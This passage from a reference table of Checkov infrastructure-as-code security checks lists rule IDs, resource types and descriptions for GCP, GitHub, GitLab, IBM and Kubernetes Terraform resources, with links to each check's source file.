resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1723 | CKV_GCP_108 | 
resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 1724 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | -| 1725 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 1726 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 1727 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1728 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1729 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | 
[GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1730 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 1731 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 1732 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1733 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1734 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1735 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1736 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1737 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1738 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 1739 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 1740 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 1741 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 1742 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 1743 | CKV_GCP_123 | resource | google_container_cluster | 
GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 1744 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 1745 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 1746 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 1747 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 1748 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 1749 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | 
Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1750 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1751 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1752 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1753 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1754 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1755 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud 
KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1756 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1757 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1758 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1759 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1760 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | 
[GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1761 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1762 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1763 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1764 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1765 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 
1766 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 1767 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 1768 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 1769 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 1770 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 1771 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | 
[GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 1772 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 1773 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 1774 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | -| 1775 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | -| 1776 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | 
[GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | -| 1777 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | -| 1778 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | -| 1779 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | -| 1780 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | -| 1781 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | -| 1782 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex 
AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | -| 1783 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | -| 1784 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | -| 1785 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | -| 1786 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | -| 1787 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | -| 1788 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | 
[GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | -| 1789 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | -| 1790 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | -| 1791 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | -| 1792 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | -| 1793 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | -| 1794 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | -| 1795 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | 
[RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | -| 1796 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1797 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1798 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1799 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 1800 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 1801 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 1802 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | 
[BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 1803 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | -| 1804 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | -| 1805 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | -| 1806 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | -| 1807 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | -| 1808 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | -| 1809 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | 
[IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | -| 1810 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | -| 1811 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | -| 1812 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | -| 1813 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | -| 1814 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | -| 1815 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | 
[ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | -| 1816 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | -| 1817 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | -| 1818 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | -| 1819 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | -| 1820 | 